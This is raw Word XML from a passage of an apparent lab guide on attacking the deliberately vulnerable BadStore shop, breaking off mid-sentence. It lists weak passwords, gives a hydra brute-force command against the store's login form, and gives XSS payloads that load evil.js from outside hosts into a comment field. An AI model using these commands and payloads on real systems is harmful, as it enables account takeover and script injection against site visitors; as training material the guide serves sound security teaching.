          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bad_store</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="736F9B48" w14:textId="759DA3E6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>verybad_store</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="0C7CDF58" w14:textId="746A327B">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BADSTOREBADSTOREBADSTORE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="526937B0" w14:textId="3DEFD4AD">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admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="79552B71" w14:textId="5A18DE48">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password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="1174427E" w14:textId="3E7CA3F2">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administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="4B666C58" w14:textId="3622B6A9">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hello</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="6D3BF991" w14:textId="0C3FCA07">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="32F6121D" w:rsidRDefault="32F6121D" w14:paraId="26404982" w14:textId="0DCD63F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="6B2071E7" w14:textId="3D964665">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="378CAE52">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attacking Badstore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="682DD73A" w14:textId="38241D71">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="378CAE52">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra </w:t>
      </w:r>
      <w:hyperlink r:id="Rfa309458df8b4bb7">
        <w:r w:rsidRPr="1FEADC78" w:rsidR="378CAE52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="378CAE52">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s 80 http-post-form "/cgi-bin/badstore.cgi?action=login:email=^USER^&amp;passwd=^PASS^:Error" -l admin -P ./hydra_passwords.txt  -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="700A78AE" w14:textId="0361693E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="4CBE4E3E" w:rsidRDefault="326B0EE2" w14:paraId="1E2D375B" w14:textId="651D3768">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="326B0EE2">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="1A3BB3AD">
        <w:rPr/>
        <w:t>APPENDIX A</w:t>
      </w:r>
      <w:r w:rsidR="63688FC7">
        <w:rPr/>
        <w:t xml:space="preserve"> - Attack Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CBE4E3E" w:rsidP="4CBE4E3E" w:rsidRDefault="4CBE4E3E" w14:paraId="430AC733" w14:textId="149D5E03">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4A8FF6BD" w:rsidP="4CBE4E3E" w:rsidRDefault="4A8FF6BD" w14:paraId="2288BD62" w14:textId="12D4764C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4A8FF6BD">
        <w:rPr/>
        <w:t xml:space="preserve">XSS/JS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="4A8FF6BD">
        <w:rPr/>
        <w:t>Inection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4A8FF6BD">
        <w:rPr/>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="394D973B" w:rsidP="4CBE4E3E" w:rsidRDefault="394D973B" w14:paraId="0882C2A1" w14:textId="0DE81E78">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="394D973B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="394D973B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>( you</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="394D973B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> may need to fix the quotation marks manually, as pasting quotes often mangles them into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="394D973B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="394D973B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) the following into the comment field</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4BFA79C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4A8FF6BD" w:rsidP="4CBE4E3E" w:rsidRDefault="4A8FF6BD" w14:paraId="0D40D0AA" w14:textId="5CAF6F4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>="s=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>('script');</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>s.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>='//kali.brett1.com/static/evil.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.body.appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(s);"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4A8FF6BD" w:rsidP="4CBE4E3E" w:rsidRDefault="4A8FF6BD" w14:paraId="31EB7682" w14:textId="48ABCC92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4A8FF6BD">
        <w:rPr/>
        <w:t>Fancy XSS/JS Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4A8FF6BD" w:rsidP="4CBE4E3E" w:rsidRDefault="4A8FF6BD" w14:paraId="5251B693" w14:textId="1EC00094">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4F90EF36">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>( you</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4F90EF36">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> may need to fix the quotation marks manually, as pasting quotes often mangles them into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4F90EF36">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4F90EF36">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="0B07E588">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>e following</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the comment field</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="5B963988">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to really impress your audience:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4A8FF6BD" w:rsidP="4CBE4E3E" w:rsidRDefault="4A8FF6BD" w14:paraId="4E4FE9BF" w14:textId="57DFAB2B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="s=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('script');</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:hyperlink r:id="Rbada9e71f0e44938">
        <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="4A8FF6BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A3BB3AD" w:rsidP="4CBE4E3E" w:rsidRDefault="727384C8" w14:paraId="7D0605EC" w14:textId="410A83DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>Parameter Pollution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A3BB3AD" w:rsidP="699639B3" w:rsidRDefault="727384C8" w14:paraId="2448FD7F" w14:textId="2FCDD0F3">
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> app is written so </w:t>
      </w:r>
      <w:r w:rsidR="5B293A83">
        <w:rPr/>
        <w:t>poorly</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="543E6342">
        <w:rPr/>
        <w:t xml:space="preserve">the shopping cart </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>actually relies</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> on the same parameter being </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>submitted</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0E67FACB">
        <w:rPr/>
        <w:t xml:space="preserve">multiple times </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>with multiple values</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">This leads to big problems, for example </w:t>
      </w:r>
      <w:r w:rsidR="24081CAE">
        <w:rPr/>
        <w:t>(see</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
